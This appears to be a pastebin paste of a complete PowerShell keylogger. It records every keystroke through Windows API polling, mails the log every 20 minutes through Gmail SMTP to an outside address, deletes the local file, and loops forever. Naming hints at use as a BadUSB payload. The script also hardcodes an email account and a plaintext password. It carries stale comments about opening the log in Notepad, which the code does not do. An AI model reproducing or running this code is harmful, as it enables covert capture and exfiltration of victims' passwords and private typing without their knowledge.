rq9csTfY

· 6 years ago · Nov 04, 2019, 12:14 PM
1############################
2#requires -Version 2
3function Start-KeyLogger($Path="$env:temp\rekaman.txt") 
4{
5  # Signatures for API Calls
6  $signatures = @'
7[DllImport("user32.dll", CharSet=CharSet.Auto, ExactSpelling=true)] 
8public static extern short GetAsyncKeyState(int virtualKeyCode); 
9[DllImport("user32.dll", CharSet=CharSet.Auto)]
10public static extern int GetKeyboardState(byte[] keystate);
11[DllImport("user32.dll", CharSet=CharSet.Auto)]
12public static extern int MapVirtualKey(uint uCode, int uMapType);
13[DllImport("user32.dll", CharSet=CharSet.Auto)]
14public static extern int ToUnicode(uint wVirtKey, uint wScanCode, byte[] lpkeystate, System.Text.StringBuilder pwszBuff, int cchBuff, uint wFlags);
15'@
16
17  # load signatures and make members available
18  $API = Add-Type -MemberDefinition $signatures -Name 'Win32' -Namespace API -PassThru
19    
20  # create output file
21  $null = New-Item -Path $Path -ItemType File -Force
22
23  try
24  {
25
26    # create endless loop. When user presses CTRL+C, finally-block
27    # executes and shows the collected key presses
28    while ($TimeEnd -ge $TimeNow) {
29      Start-Sleep -Milliseconds 40
30      
31      # scan all ASCII codes above 8
32      for ($ascii = 9; $ascii -le 254; $ascii++) {
33        # get current key state
34        $state = $API::GetAsyncKeyState($ascii)
35
36        # is key pressed?
37        if ($state -eq -32767) {
38          $null = [console]::CapsLock
39
40          # translate scan code to real code
41          $virtualKey = $API::MapVirtualKey($ascii, 3)
42
43          # get keyboard state for virtual keys
44          $kbstate = New-Object Byte[] 256
45          $checkkbstate = $API::GetKeyboardState($kbstate)
46
47          # prepare a StringBuilder to receive input key
48          $mychar = New-Object -TypeName System.Text.StringBuilder
49
50          # translate virtual key
51          $success = $API::ToUnicode($ascii, $virtualKey, $kbstate, $mychar, $mychar.Capacity, 0)
52
53          if ($success) 
54          {
55            # add key to logger file
56            [System.IO.File]::AppendAllText($Path, $mychar, [System.Text.Encoding]::Unicode) 
57          }
58        }
59      }
60	  $TimeNow = Get-Date
61    }
62  }
63  finally
64  {
65    # open logger file in Notepad
66	$ReportEmail.Attachments.Add($Path)
67	$SMTPInfo.Send($ReportEmail)
68	start-sleep 10
69	$ReportEmail.Dispose()
70	Remove-Item -Path $Path -force
71	#exit 1
72  }
73}
74
75# records all key presses until script is aborted by pressing CTRL+C
76# will then open the file with collected key codes
77# Start-KeyLogger
78while($true)
79{
80    $i++
81		# Edit only this section!
82		$TimeToRun = 20
83		$SMTPServer = 'smtp.gmail.com'
84		$SMTPInfo = New-Object Net.Mail.SmtpClient($SmtpServer, 587)
85		$SMTPInfo.EnableSsl = $true
86		$SMTPInfo.Credentials = New-Object System.Net.NetworkCredential('badusb.kl1', 'Kamijoro24');
87		$ReportEmail = New-Object System.Net.Mail.MailMessage
88		$ReportEmail.From = 'badusb.kl1@gmail.com'
89		$ReportEmail.To.Add('badusb.kl2@gmail.com')
90		$ReportEmail.Subject = 'Keyboard log'
91		$ReportEmail.Body = 'Attached is your keyboard log. ' 
92		$TimeStart = Get-Date
93		$TimeEnd = $timeStart.addminutes($TimeToRun)
94    Start-KeyLogger
95}